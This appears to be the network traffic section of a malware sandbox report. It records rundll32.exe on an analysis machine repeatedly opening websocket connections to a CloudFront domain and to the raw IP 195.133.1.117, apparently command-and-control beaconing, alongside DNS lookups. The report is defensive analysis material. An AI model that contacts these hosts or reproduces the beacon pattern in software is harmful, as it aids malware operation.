                                  Dec 19, 2024 15:33:49.913068056 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:50.033763885 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.033859968 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:50.153448105 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.350435972 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:33:50.399667978 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:33:52.619760036 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:52.739644051 CET804975813.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:52.739986897 CET4975880192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.356545925 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.476686001 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:55.479384899 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.479561090 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:55.601279020 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.195384979 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.244748116 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.397694111 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.517165899 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.517258883 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:57.637836933 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:57.995872021 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:33:58.040493965 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:33:59.930838108 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:00.051045895 CET8049785195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:00.051106930 CET4978580192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.010041952 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.129614115 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:03.129704952 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.129868984 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:03.249797106 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:04.454114914 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:04.508984089 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.156804085 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.281114101 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.281177998 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:05.400801897 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.598139048 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:05.643403053 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:07.410480976 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:07.532530069 CET804980213.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:07.532587051 CET4980280192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.620111942 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.739814043 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:10.740031958 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.740097046 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:10.859872103 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.379698992 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.426156044 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.557523966 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.677548885 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:12.677674055 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:12.797143936 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:13.163121939 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:13.215950012 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:15.174087048 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:15.295435905 CET8049821195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:15.297642946 CET4982180192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.171370029 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.291194916 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:18.291336060 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.291609049 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:18.411369085 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.637278080 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.687573910 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:19.815155029 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:19.934806108 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:19.934922934 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:20.060491085 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:20.301285982 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:20.348638058 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:22.568510056 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:22.688543081 CET804983913.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:22.689517021 CET4983980192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.304825068 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.424400091 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:25.424587011 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.424748898 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:25.544274092 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.064802885 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.115391970 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.354855061 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.474721909 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.474833965 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:27.594317913 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.944556952 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:27.997677088 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:29.827049971 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:29.946962118 CET8049856195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:29.947118998 CET4985680192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:32.952460051 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.072006941 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:33.072086096 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.072304010 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:33.191698074 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.408550024 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.452037096 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.696934938 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.817320108 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:34.817425013 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:34.937192917 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:35.134330034 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:35.184134960 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:37.357224941 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:37.477333069 CET804987613.227.9.174192.168.2.6
                                  Dec 19, 2024 15:34:37.478703976 CET4987680192.168.2.613.227.9.174
                                  Dec 19, 2024 15:34:40.349100113 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.469360113 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:40.469491005 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.469644070 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:40.589627981 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.144905090 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.185398102 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.309211016 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.429059982 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.429136992 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:42.548983097 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.902257919 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:42.952112913 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:44.703485966 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:44.823851109 CET8049893195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:44.823935032 CET4989380192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:47.907129049 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.026819944 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:48.026957035 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.027105093 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:48.146775007 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:49.359086990 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:49.406656027 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.026510000 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.146429062 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.146585941 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:50.270704985 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.462704897 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:34:50.465574980 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.465622902 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:50.465672970 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.466101885 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:50.466111898 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:50.513051987 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:34:51.679030895 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.679099083 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.681154966 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.681164026 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.681421041 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:51.691301107 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:51.691339016 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121267080 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121356010 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121403933 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121912003 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121912003 CET49933443192.168.2.634.120.62.213
                                  Dec 19, 2024 15:34:52.121931076 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.121942043 CET4434993334.120.62.213192.168.2.6
                                  Dec 19, 2024 15:34:52.311577082 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:52.431646109 CET804990913.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:52.433314085 CET4990980192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.469716072 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.589534044 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:55.589617014 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.589782000 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:55.709394932 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.333468914 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.374138117 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.516567945 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.636612892 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:57.636703968 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:34:57.759418011 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:58.107574940 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:34:58.159410000 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:00.035732985 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:00.156249046 CET8049927195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:00.158763885 CET4992780192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.114114046 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.234601021 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:03.234860897 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.235033035 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:03.354643106 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:04.601799011 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:04.644942999 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.054141998 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.173659086 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.173742056 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:05.293358088 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.494539022 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:05.540724039 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:07.526484966 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:07.646891117 CET804994513.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:07.646955967 CET4994580192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.497674942 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.617288113 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:10.617558956 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.617825985 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:10.738128901 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.266375065 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.307797909 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.611402988 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.730914116 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:12.732884884 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:12.852514029 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:13.203299999 CET804997613.227.9.48192.168.2.6
                                  Dec 19, 2024 15:35:13.253485918 CET4997680192.168.2.613.227.9.48
                                  Dec 19, 2024 15:35:15.056364059 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:15.176415920 CET8049960195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:15.176522017 CET4996080192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.213044882 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.332698107 CET8049994195.133.1.117192.168.2.6
                                  Dec 19, 2024 15:35:18.332798004 CET4999480192.168.2.6195.133.1.117
                                  Dec 19, 2024 15:35:18.332947016 CET4999480192.168.2.6195.133.1.117
                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Dec 19, 2024 15:33:36.732510090 CET | 51291 | 53 | 192.168.2.6 | 1.1.1.1
                                  Dec 19, 2024 15:33:37.191641092 CET | 53 | 51291 | 1.1.1.1 | 192.168.2.6
                                  Dec 19, 2024 15:33:43.249764919 CET | 56221 | 53 | 192.168.2.6 | 1.1.1.1
                                  Dec 19, 2024 15:33:43.471576929 CET | 53 | 56221 | 1.1.1.1 | 192.168.2.6
                                  Dec 19, 2024 15:34:40.140265942 CET | 61577 | 53 | 192.168.2.6 | 1.1.1.1
                                  Dec 19, 2024 15:34:40.348290920 CET | 53 | 61577 | 1.1.1.1 | 192.168.2.6
                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                  Dec 19, 2024 15:33:36.732510090 CET | 192.168.2.6 | 1.1.1.1 | 0xebd2 | Standard query (0) | d2np1vqkcxhde6.cloudfront.net | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:33:43.249764919 CET | 192.168.2.6 | 1.1.1.1 | 0xc47e | Standard query (0) | o4508128816857088.ingest.de.sentry.io | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:34:40.140265942 CET | 192.168.2.6 | 1.1.1.1 | 0x1ae4 | Standard query (0) | d2np1vqkcxhde6.cloudfront.net | A (IP address) | IN (0x0001) | false
                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                  Dec 19, 2024 15:33:37.191641092 CET | 1.1.1.1 | 192.168.2.6 | 0xebd2 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.174 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:33:37.191641092 CET | 1.1.1.1 | 192.168.2.6 | 0xebd2 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.133 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:33:37.191641092 CET | 1.1.1.1 | 192.168.2.6 | 0xebd2 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.64 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:33:37.191641092 CET | 1.1.1.1 | 192.168.2.6 | 0xebd2 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.48 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:33:43.471576929 CET | 1.1.1.1 | 192.168.2.6 | 0xc47e | No error (0) | o4508128816857088.ingest.de.sentry.io | | 34.120.62.213 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:34:40.348290920 CET | 1.1.1.1 | 192.168.2.6 | 0x1ae4 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.48 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:34:40.348290920 CET | 1.1.1.1 | 192.168.2.6 | 0x1ae4 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.174 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:34:40.348290920 CET | 1.1.1.1 | 192.168.2.6 | 0x1ae4 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.133 | A (IP address) | IN (0x0001) | false
                                  Dec 19, 2024 15:34:40.348290920 CET | 1.1.1.1 | 192.168.2.6 | 0x1ae4 | No error (0) | d2np1vqkcxhde6.cloudfront.net | | 13.227.9.64 | A (IP address) | IN (0x0001) | false
                                  • o4508128816857088.ingest.de.sentry.io
                                  • d2np1vqkcxhde6.cloudfront.net
                                  • 195.133.1.117
                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  0 | 192.168.2.6 | 49747 | 13.227.9.174 | 80 | 2912 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:33:37.346776009 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: hYIl3tcxOdFjfsPRnTVigw==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  1 | 192.168.2.6 | 49758 | 13.227.9.174 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:33:40.634614944 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 4o/S/DnI/xUOQ7/tWSDOmw==
                                  Dec 19, 2024 15:33:42.285434961 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: FNrr22x3FG7ewK4F8l7R0ycBBmE=
                                  date: Thu, 19 Dec 2024 14:33:41 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 e94ebbd334f21d0c5b4f99e7409632a4.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: jewh7U2KNppS8B-uTVyueMHMeQqmIxOdOPLW5h7ZqGAbSOvlfnw8vg==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  2 | 192.168.2.6 | 49785 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:33:48.370152950 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: mm3wcIuOeiJHtLi7cs4F3g==
                                  Dec 19, 2024 15:33:49.716358900 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: o6U6dQzERko9sm7UXGc5RDmEJ6U=
                                  date: Thu, 19 Dec 2024 14:33:49 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  3 | 192.168.2.6 | 49802 | 13.227.9.174 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:33:55.479561090 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: RNaQVJ0zTL1uqG8J1zu+SQ==
                                  Dec 19, 2024 15:33:57.195384979 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: Ul+EK1gGu6Yc7NoPwd4p5LHTfUw=
                                  date: Thu, 19 Dec 2024 14:33:56 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 5d8f90037465fc1f7bd2f356871e7d64.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: RppiH4K7ItLPGrJRhI4Rc36C-WvG0iCtFfET3ATREcS5IhBuVjbF3Q==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  4 | 192.168.2.6 | 49821 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:03.129868984 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: gJK8B/FHxxJOrYPc07zPdA==
                                  Dec 19, 2024 15:34:04.454114914 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: evVrlLPoPgxHyCvgaI4viaiTfw4=
                                  date: Thu, 19 Dec 2024 14:34:04 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  5 | 192.168.2.6 | 49839 | 13.227.9.174 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:10.740097046 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: 3I3wooedh91j3GxPYkeArw==
                                  Dec 19, 2024 15:34:12.379698992 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: E7DHd6CZtxGtPG3u7rKhTe2/5qw=
                                  date: Thu, 19 Dec 2024 14:34:11 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 c21fdfe928c795c1f24f3b6117a48670.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: LAdWqGM3ZE40rQQpZFGMqI7_ZDnNOa4eqmLuehIqpqiiy5l7Ciii4Q==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  6 | 192.168.2.6 | 49856 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:18.291609049 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: JApRj8zYZyC8oZg2we4Azg==
                                  Dec 19, 2024 15:34:19.637278080 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: +M9DBILUcoy42qToW/piyouixoc=
                                  date: Thu, 19 Dec 2024 14:34:19 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  7 | 192.168.2.6 | 49876 | 13.227.9.174 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:25.424748898 CET | 170 | OUT | GET /ws HTTP/1.1
                                  Host: d2np1vqkcxhde6.cloudfront.net
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: MG/uZPS22IGDcq20LYVyjA==
                                  Dec 19, 2024 15:34:27.064802885 CET | 363 | IN | HTTP/1.1 101 Switching Protocols
                                  Connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: kRZzgJbyRcfw0TCvAZ/+URRVnW0=
                                  date: Thu, 19 Dec 2024 14:34:26 GMT
                                  X-Cache: Miss from cloudfront
                                  Via: 1.1 ba38368c2b2437f314bbc0ee51e6632e.cloudfront.net (CloudFront)
                                  X-Amz-Cf-Pop: BAH53-C1
                                  X-Amz-Cf-Id: nYAiC1h7c5GzHMFBHcFO5oJsw08R1sIq8T9Hjyb3TgF7XaS-2hS6Vw==


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  8 | 192.168.2.6 | 49893 | 195.133.1.117 | 80 | 5328 | C:\Windows\System32\rundll32.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Dec 19, 2024 15:34:33.072304010 CET | 154 | OUT | GET /ws HTTP/1.1
                                  Host: 195.133.1.117
                                  Connection: Upgrade
                                  Upgrade: websocket
                                  Sec-WebSocket-Version: 13
                                  Sec-WebSocket-Key: /G1bGErhqg3xJ3/YMCdIKA==
                                  Dec 19, 2024 15:34:34.408550024 CET | 166 | IN | HTTP/1.1 101 Switching Protocols
                                  connection: upgrade
                                  upgrade: websocket
                                  sec-websocket-accept: 9HnImZ6yJL5mIkWKAPEFfABAIYU=
                                  date: Thu, 19 Dec 2024 14:34:34 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
